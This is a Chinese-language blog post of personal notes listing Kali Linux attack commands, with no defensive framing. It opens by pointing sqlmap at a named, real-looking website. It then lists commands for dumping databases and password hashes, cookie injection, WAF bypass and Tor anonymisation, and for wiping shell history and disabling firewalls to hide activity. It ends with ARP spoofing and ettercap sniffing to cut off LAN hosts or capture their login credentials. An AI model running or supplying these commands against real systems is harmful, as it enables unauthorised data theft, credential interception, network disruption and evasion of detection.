kali常用语句小总结，晓桂科技分享

Kali常用

虽然自己没学懂，但是至少做了笔记，今天就分享一下吧

sqlmap -u http://www.keruihz.com/news_show.aspx?id=97

sqlmap -u http://www.keruihz.com/news_show.aspx?id=97 --tables

nmap --script=vuln 漏洞扫描脚本

sqlmap -u 注入点 检测注入点是否可用

sqlmap -u 注入点 --batch 自动输入

暴库

sqlmap -u 注入点 --dbs

Web当前使用的数据库

sqlmap -u 注入点 --current-db

Web数据库使用的账户

sqlmap -u 注入点 --current-user

列出sqlserver所有用户

sqlmap -u 注入点 --users

数据库账户与密码

sqlmap -u 注入点 --passwords

列出数据库中的表

sqlmap -u 注入点 -D tourdata --tables (-D指定数据库名称)

列出表中字段

sqlmap -u 注入点 -D tourdata -T userb --columns

爆字段内容

sqlmap -u注入点-D tourdata -T userb -C “email,username,userpassword” --dump (将结果导出)

指定导出特定范围字段

sqlmap -u注入点-D tourdata -T userb -C “email,username,userpassword”--start 1 --stop 10 --dump (1,10行数)

Cookie注入

sqlmap -u “注入点” --cookie “id=97” --level 2

sqlmap -u “注入点” --table --cookie “id=97” --level 2

sqlmap -u “注入点” --columns -T “user” --cookie “id=97” --level 2

sqlmap -u “注入点” --dump -C “username,password”--columns -T “user” --cookie “id=97” --level 2

可对以上参数进行结合使用

python sqlmap.py -u “注入点” -f --banner --dbs --users

绕过防火墙注入

确认是否开了WAF

Sqlmap -u “注入点” --thread 10 --identify-waf (首选)

sqlmap -u “注入点” --thread 10 --check-waf 备选

使用参数绕过

Sqlmap -u “注入点” --random-agent -v 2 （浏览器绕过）

Sqlmap -u “注入点” --hpp -v 3 (参数污染绕过)

Sqlmap -u “注入点” --delay=3.5 --time-sec=60

Sqlmap -u “注入点” --proxy=211.211.211.211.8080 --proxy-cred=211.:985 代理注入

sqlmap -u “注入点” --ignore-proxy 禁止用代理注入，直接注入

sqlmap -u “注入点” --flush-session 清空会话，重构注入

sqlmap -u “注入点” -hex 或者--no-cast 进行字符码转换

sqlmap -u “注入点” --mobile 对移动端的服务器进行注入

sqlmap -u “注入点” --tor 匿名注入

脚本注入的格式

sqlmap -u “注入点” --tamper=A.py,B.py A,B是脚本

php的--dbs asp的--tables

DNS欺骗

命令

Dnsdict6

-4 查询ipv4子域名 windows下推荐子域名查询 http://sgwl.top/1.php

-t 数字 设置线程

-D 路径 设置字典文件 一般不需要

dnsenum

-enum 顶级域名查询

-w 查询whois信息

lbd 负载平衡检测器,检测给定的域是否使用DNS和/或HTTP负载平衡

lbd 域名

smpt-user-enm 用户名猜测工具

-U 路径 指定user字典

-t host host指定主机 指定IP

-M 模式 指定模式

-p 数字 指定 tcp端口

ace 查询

-i 指定网卡

-c cdp模式

-t 指定IP

-m 指定mas地址

hping查询

局域网攻击 yerdpress

-G 启动GUI

burp 抓包改包

远程控制

rdesktop -u username -p password ip

Uptime 查看命令窗口打开个数

W 查看用户登录数

清除命令记录

export HISTFILESIZE=0;HISTFILE=0;HISTSIZE=0;

关闭ubuntu防火墙

ufw disable

卸载iptables

apt-get remove iptables

断网攻击

ARP 攻击

arpspoof -i eth0 -t 目标 IP 网关

没有出现转发才断网（配置错误）

ARP欺骗

目标IP的流量经过我的网卡，从网关出去

进行IP流量转发

echo 1 > /proc/sys/net/ipv4/ip_forward

driftnet -i eth0 可以从小窗口看到

存在桌面

HTTP账号密码获取

开启IP转发

echo 1 > /proc/sys/net/ipv4/ip_forward

查看是否成功

cat /proc/sys/net/ipv4/ip_forward

1

表示欺骗成功

ettercap -Tq -i eth0

-Tq 启动文本模式 ，q安静模式 -i 网卡

截取流量，获取同网段登录的账号和密码